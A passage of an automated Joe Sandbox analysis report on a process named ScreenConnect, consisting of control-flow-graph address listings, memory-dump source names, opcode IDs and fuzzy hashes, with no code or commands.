493->483 496 7ffd9bb96e08-7ffd9bb96e1a 494->496 497 7ffd9bb96d59-7ffd9bb96d70 494->497 496->368 497->496 501 7ffd9bb96d76-7ffd9bb96d93 497->501 504 7ffd9bb96d95-7ffd9bb96d9d 501->504 505 7ffd9bb96d9f 501->505 506 7ffd9bb96da1-7ffd9bb96da3 504->506 505->506 506->496 508 7ffd9bb96da5-7ffd9bb96daf 506->508 509 7ffd9bb96dbd-7ffd9bb96dc5 508->509 510 7ffd9bb96db1-7ffd9bb96dbb call 7ffd9bb914f8 508->510 512 7ffd9bb96dc7-7ffd9bb96dec call 7ffd9bb95050 509->512 513 7ffd9bb96df3-7ffd9bb96e06 call 7ffd9bb95188 509->513 510->368 510->509 512->513 513->368
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: 0e6dce4f30cb9713de294d7694695ccc56d622bf17556a5a42fcb98e0ce20532
                                                                                                                                                                                                                                                  • Instruction ID: f4f1f42350c7b571dff961f3227fd884ee7dcc2b2a5359938c654b4992fd15f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e6dce4f30cb9713de294d7694695ccc56d622bf17556a5a42fcb98e0ce20532
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED321831B0EE4E0FE7A597A8C4746B967D1FF94388F56007AD05EC72F6DE28AA058341
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9220031fd2e207281f5781b147306940435d33a150b88cefb5942cefdc9bd6e4
                                                                                                                                                                                                                                                  • Instruction ID: 9e69d34f10bc7211aa0b726d4d2ce424e75adade3cd3f51a6094fada510c46d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9220031fd2e207281f5781b147306940435d33a150b88cefb5942cefdc9bd6e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86122631B1EA4E4BEBB99AA8D4B06B43391FF5438CF160179D45EC71E7ED28A9468340

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2949550658.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                                                  • Opcode ID: b299d35fc94ded8f1d337901cab6e28274d576d7fc35b51867b341c4a099c607
                                                                                                                                                                                                                                                  • Instruction ID: cf13b99d0012973a44c012937122966b84475dbc9437e08e0d9a743afed9e139
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b299d35fc94ded8f1d337901cab6e28274d576d7fc35b51867b341c4a099c607
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68413931D0DB484FDB29AFA89C4A5E97BE0EF59310F04017FE499C3192DF78A9468B91

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 548 7ffd9bb96c87-7ffd9bb96ca1 551 7ffd9bb96ca7-7ffd9bb96cb5 548->551 552 7ffd9bb96ca3-7ffd9bb96ca5 548->552 553 7ffd9bb96cb8-7ffd9bb96cc1 551->553 552->553 556 7ffd9bb96cc8-7ffd9bb96ccf 553->556 557 7ffd9bb96cd5-7ffd9bb96cdc 556->557 558 7ffd9bb96e1e-7ffd9bb96e3c call 7ffd9bb90960 * 2 556->558 557->558 559 7ffd9bb96ce2-7ffd9bb96cf9 557->559 567 7ffd9bb96e66-7ffd9bb96e84 call 7ffd9bb90960 * 2 558->567 568 7ffd9bb96e3e-7ffd9bb96e48 558->568 564 7ffd9bb96cfb-7ffd9bb96d0d 559->564 565 7ffd9bb96d2e-7ffd9bb96d39 559->565 574 7ffd9bb96d0f-7ffd9bb96d11 564->574 575 7ffd9bb96d13-7ffd9bb96d21 564->575 578 7ffd9bb96d3b-7ffd9bb96d3d 565->578 579 7ffd9bb96d3f-7ffd9bb96d4e 565->579 590 7ffd9bb96e8a-7ffd9bb96e95 567->590 591 7ffd9bb96f3b-7ffd9bb96f46 567->591 570 7ffd9bb96e4a-7ffd9bb96e5a 568->570 571 7ffd9bb96e5c 568->571 576 7ffd9bb96e5e-7ffd9bb96e5f 570->576 571->576 580 7ffd9bb96d24-7ffd9bb96d27 574->580 575->580 576->567 583 7ffd9bb96d51-7ffd9bb96d53 578->583 579->583 580->565 585 7ffd9bb96e08-7ffd9bb96e1a 583->585 586 7ffd9bb96d59-7ffd9bb96d70 583->586 585->558 586->585 594 7ffd9bb96d76-7ffd9bb96d93 586->594 596 7ffd9bb96e97-7ffd9bb96e99 590->596 597 7ffd9bb96e9b-7ffd9bb96eaa 590->597 598 7ffd9bb96f48-7ffd9bb96f4a 591->598 599 7ffd9bb96f4c-7ffd9bb96f50 591->599 613 7ffd9bb96d95-7ffd9bb96d9d 594->613 614 7ffd9bb96d9f 594->614 600 7ffd9bb96ead-7ffd9bb96ecd 596->600 597->600 602 7ffd9bb96f5e-7ffd9bb96f60 598->602 605 7ffd9bb96f5a-7ffd9bb96f5b 599->605 604 7ffd9bb96ecf-7ffd9bb96ee1 600->604 606 7ffd9bb96f66-7ffd9bb96f78 602->606 607 7ffd9bb970b2-7ffd9bb970bd 602->607 604->591 612 7ffd9bb96ee3-7ffd9bb96ef1 604->612 605->602 606->605 611 7ffd9bb96f88-7ffd9bb96fa6 call 7ffd9bb90960 * 2 606->611 611->607 639 7ffd9bb96fac-7ffd9bb96fb3 611->639 616 7ffd9bb96ef3-7ffd9bb96efb 612->616 617 7ffd9bb96f04-7ffd9bb96f0c 612->617 618 7ffd9bb96da1-7ffd9bb96da3 613->618 614->618 620 7ffd9bb96f0d-7ffd9bb96f0e 616->620 621 7ffd9bb96efd-7ffd9bb96f02 616->621 617->620 623 7ffd9bb96f1e-7ffd9bb96f33 617->623 618->585 624 7ffd9bb96da5-7ffd9bb96daf 618->624 628 7ffd9bb96f13-7ffd9bb96f1d call 7ffd9bb96820 620->628 621->628 623->604 641 7ffd9bb96f35-7ffd9bb96f38 623->641 625 7ffd9bb96dbd-7ffd9bb96dc5 624->625 626 7ffd9bb96db1-7ffd9bb96dbb call 7ffd9bb914f8 624->626 631 7ffd9bb96dc7-7ffd9bb96dec call 7ffd9bb95050 625->631 632 7ffd9bb96df3-7ffd9bb96e06 call 7ffd9bb95188 625->632 626->558 626->625 628->623 631->632 632->558 643 7ffd9bb96fb5-7ffd9bb96fc4 639->643 644 7ffd9bb96fc6-7ffd9bb96fc8 639->644 641->591 643->644 649 7ffd9bb96fca 643->649 647 7ffd9bb96fcf-7ffd9bb96ff3 644->647 651 7ffd9bb96ff5-7ffd9bb97012 647->651 652 7ffd9bb9703f-7ffd9bb9704e 647->652 649->647 655 7ffd9bb97018-7ffd9bb9703d 651->655 656 7ffd9bb970be-7ffd9bb97137 651->656 652->607 655->652 663 7ffd9bb97139-7ffd9bb9716f 656->663 664 7ffd9bb97180-7ffd9bb971d6 656->664 674 7ffd9bb971dd-7ffd9bb97200 663->674 677 7ffd9bb97171-7ffd9bb9717d 663->677 671 7ffd9bb971d8-7ffd9bb971d9 664->671 672 7ffd9bb971dc 664->672 671->672 672->674 678 7ffd9bb97232-7ffd9bb9723b 674->678 679 7ffd9bb97202-7ffd9bb97211 674->679 677->664 680 7ffd9bb97217-7ffd9bb97231 679->680 681 7ffd9bb97213-7ffd9bb97214 679->681 681->680
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: aa47a16e721debbb73406acc4f8205c6e493daead7be565bc94e4e17827a1abe
                                                                                                                                                                                                                                                  • Instruction ID: 9edbd51e18dec768b43da55f785737ece9d1791b4b47ebd1c3d1e5b52e687661
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa47a16e721debbb73406acc4f8205c6e493daead7be565bc94e4e17827a1abe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7717531F1AD1F4BEB7997A4C4706B962D2FF9838CF564039D41FC32E6DE296A418240

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                                                  • Opcode ID: 939625d6a65bd000342baf51e3bb5167f5abd5652c938a1810598693c50b1af2
                                                                                                                                                                                                                                                  • Instruction ID: cb9f02cf5cd8ee10499b237ad47cea54a8cdeffc02c280f5c1dff57f6023030b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939625d6a65bd000342baf51e3bb5167f5abd5652c938a1810598693c50b1af2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC514732B0EE4D4FEB649BA8EC615E977E1FF94348F05017AE45CC31E2EE25A9068740

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 988 7ffd9bb9814a-7ffd9bb98154 990 7ffd9bb98156-7ffd9bb98167 988->990 991 7ffd9bb9819e-7ffd9bb981d2 988->991 994 7ffd9bb98169-7ffd9bb9817a 990->994 995 7ffd9bb9817f-7ffd9bb98188 990->995 992 7ffd9bb981ea-7ffd9bb981f8 991->992 993 7ffd9bb981d4-7ffd9bb981de 991->993 1001 7ffd9bb981ff-7ffd9bb98222 992->1001 1002 7ffd9bb981fa call 7ffd9bb97fb0 992->1002 993->992 1000 7ffd9bb981e0-7ffd9bb981e8 993->1000 994->995 1000->1001 1002->1001
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: W
                                                                                                                                                                                                                                                  • API String ID: 0-655174618
                                                                                                                                                                                                                                                  • Opcode ID: d478bf0c578ad9aa3e974f5cec000bafda5080cff696be988523eb235f8b5902
                                                                                                                                                                                                                                                  • Instruction ID: 90f3354c394169313fedb229aaaba304362d607ea7163f39574e64d8e19fee5a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d478bf0c578ad9aa3e974f5cec000bafda5080cff696be988523eb235f8b5902
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21793160EA894FD769AB34DC605A5BBF1FF89318B0502BAD44DC31E3DB28A802C341
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 740d378188e6cf91fe7781bb0d7d60200f251439b7f1dd0040e8a98fc2d701fa
                                                                                                                                                                                                                                                  • Instruction ID: cf1052707fa2fc87584c81eb8339ccdb3fcf649686472f9540637125266db965
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740d378188e6cf91fe7781bb0d7d60200f251439b7f1dd0040e8a98fc2d701fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF022671B0EA4E4FE7A9E6ACD4A56B437D1FF98348F4500BAE44DC72E3DD24A9468340
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f9a3388b9df4eb0c55bbb1c8821ab597b690bb9a142b14a587c247b3358cb984
                                                                                                                                                                                                                                                  • Instruction ID: b371a89ab2d4547369b93455579be3d8568154be4f03b945ff46852e94d932f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a3388b9df4eb0c55bbb1c8821ab597b690bb9a142b14a587c247b3358cb984
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FC13932A0EA4E0BEB79DA58C8628B57391FF9475CB05017DD45E871D3EE24FA0AC781
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0787f8f3dacf96fcb06a83cdcd234b3b28cb29264fb7f58c628de23d7179e68c
                                                                                                                                                                                                                                                  • Instruction ID: ce32b10dacbe61c81942d45a207ab25c87c20e8f083c0fc231650dfc5866fce6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0787f8f3dacf96fcb06a83cdcd234b3b28cb29264fb7f58c628de23d7179e68c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2812871B1EA4E4BEBA8AA68C4A16A43381FF6438CF1541BDD45EC71E7ED24F9468340
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 729c90cea1fcba91b7a48fe919b45f7c8b5f60624dfcba25a19b9374944077e7
                                                                                                                                                                                                                                                  • Instruction ID: 2c0e0781497959d74490eb0690b4cf1949d09e07e1bc822a3a2566d60aa07cee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 729c90cea1fcba91b7a48fe919b45f7c8b5f60624dfcba25a19b9374944077e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7061123470DA098FDBDCEF58C4A0AA177E2FF99308B2505A8D059CF69ACA25ED43C750
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b09be8ba920cf151fb3e36e512f4e1b3037a3c959ba956d1c3b145dbd1636b05
                                                                                                                                                                                                                                                  • Instruction ID: 142f1cda97efb4d13e5fe224bcdc463e23b03cf12ade54ddeaa8eff1f9a1df38
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b09be8ba920cf151fb3e36e512f4e1b3037a3c959ba956d1c3b145dbd1636b05
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC512D51B0E65B4FE76E6BA8A4B15F83B51EF4531CF4901BAD09DC70E7DD18A4068341
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c99c3b60d49241690f3164f76bb5bc8fe1ea926851f66adb3b2ce246287c4d9e
                                                                                                                                                                                                                                                  • Instruction ID: 34690c57fcb445322b95934031e6ddb19749b9b3f868324529ed7978a5a4df4c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c99c3b60d49241690f3164f76bb5bc8fe1ea926851f66adb3b2ce246287c4d9e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3951A472B0DA494FDB9CDE68C461A6537D2FFA4318B0501B9D45DCB2E7DA25F802C740
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f2d7800a76a35251b79fbcfd26d64116bbde04c0630b679207dc158b51ebf802
                                                                                                                                                                                                                                                  • Instruction ID: 4b7d6dcb66a1b000e5d63a72b3374858a86fb4c5c95a20ab6075d341bb70b6c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d7800a76a35251b79fbcfd26d64116bbde04c0630b679207dc158b51ebf802
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52417371609B4D8FDB98DF18C8B4A6937A1FF58318B1505ADE45EC72E2DA35E852CB00
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5784d7bc4233b9fa7e982b1d075b1d9ba26a0ddbf2ddfaa7bb60890db16c4240
                                                                                                                                                                                                                                                  • Instruction ID: 3d04dba590f3e5222ae7e19b5fc70b4cbdd73e6b663ebb29e6bc9a2ee4e30a03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5784d7bc4233b9fa7e982b1d075b1d9ba26a0ddbf2ddfaa7bb60890db16c4240
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86316E21A0EBCD4FE767976448355A47FB1AF57204B4A01EBD089CB1F3D9196D098352
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 55ea220e618222e5ac6c65f89a466cea5308014656c94dc4247c08bc5c351fc3
                                                                                                                                                                                                                                                  • Instruction ID: 93ea1c3c7cf005113c20f6afc10cc7afa3313ac36c2fa6de3bb7ebfdd370dc70
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55ea220e618222e5ac6c65f89a466cea5308014656c94dc4247c08bc5c351fc3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1431D533F0EA4C4BDBA596A8DC311E83BA1FF45398F0601A7E54CD32E2EA1999048381
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7cedb06846e4d4935dfa3ff629b0f9ed55d83cf3f3d03cab34e225c22de87852
                                                                                                                                                                                                                                                  • Instruction ID: d522a364be7699a003063d8981a9bb21e62115fc9615c046a6ac021aabeedec5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cedb06846e4d4935dfa3ff629b0f9ed55d83cf3f3d03cab34e225c22de87852
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C11B472F0EB4C5BDFA4DFA498B10A83FA1FF55308F0605AAE05DC32A2DA71A5018701
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 39d51af66970868c6169ab9aa3f452f0563a8323fb369b2963f220539bbac4ce
                                                                                                                                                                                                                                                  • Instruction ID: 7b6c246372ea0cf2c58657709ea1d4b482f2c3c5657889c7a2e4331679079632
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39d51af66970868c6169ab9aa3f452f0563a8323fb369b2963f220539bbac4ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9110614F0EA5B0BF7799368847037427E1EF85348F0A81BEC449C32E6DC2CAD818311
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 101b8fcfdd9570a990d0b02a62674574afb53cb0fd39fff78244531bfb6a64de
                                                                                                                                                                                                                                                  • Instruction ID: 820b0478a179062288bd2638718c9d2c96a6d4fb2ba417e6d9d986bc771d5044
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 101b8fcfdd9570a990d0b02a62674574afb53cb0fd39fff78244531bfb6a64de
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D119371B099494FDB9CEF98C460B657791FF68308B0541B8C45DCB2D7DE25E905C780
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4d444fc40d27c066f1ec5d8b6454c879de1dfa6de66103203a28a47f2fafd566
                                                                                                                                                                                                                                                  • Instruction ID: 55faf914fa24a24484ec71267dec130accca0ce5b84570cd158c7c77690e22fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d444fc40d27c066f1ec5d8b6454c879de1dfa6de66103203a28a47f2fafd566
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77116071B199494FDB9CEF58C460B657792FF68308B0541B8C45DCB2D7DE25E906C780
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 42cad55f13f14b8d1a5ded4631833444dede7a311d9903b5431842258f7989f1
                                                                                                                                                                                                                                                  • Instruction ID: ba3c51ff132d30bcfd7e5244657a0ff4b78a873b4b068f64744b3717ece16480
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42cad55f13f14b8d1a5ded4631833444dede7a311d9903b5431842258f7989f1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF08C2240E2D24FD36697B488A56E47FF0AF47110B0F82FAD0C8CB4A3D50C598A8361
                                                                                                                                                                                                                                                  Memory Dump Source
